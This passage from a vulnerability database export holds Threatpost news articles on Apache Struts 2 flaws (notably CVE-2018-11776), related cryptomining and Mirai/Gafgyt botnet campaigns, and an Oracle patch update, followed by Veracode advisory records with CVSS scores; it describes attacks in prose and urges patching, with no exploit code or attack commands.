Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n[![bitbucket](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket.png>)\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another features, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead developers can use third party-tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n[![github](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github.png>)\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developers first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem at the bud is the used of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\n[![nodejs](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs.png>)The Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T15:19:39", "description": "struts2-core is vulnerable to remote code execution (RCE) attacks. These attacks are possible when using a `namespace` or `url` tag which doesn't have a `value` and `action` set and where its upper action configuration is using a wildcard `namespace` or has no `namespace`.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T17:36:38", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2020-07-16T05:52:58", "id": "VERACODE:7342", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-7342/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T15:26:36", "description": "Apache Tomcat is vulnerable to insecure defaults. The CORS filter provided by default is insecure as it enables `supportsCredentials` for all origins. This can allow a malicious user unauthorized access to sensitive resources.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-17T04:40:32", "type": "veracode", "title": "Insecure Defaults", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2020-06-16T05:48:45", "id": "VERACODE:6315", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6315/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:22:04", "description": "Apache Tomcat is vulnerable to insecure defaults. The CORS filter provided by default is insecure as it enables `supportsCredentials` for all origins. This can allow a malicious user unauthorized access to sensitive resources.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:24:32", "type": "veracode", "title": "Insecure Defaults", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 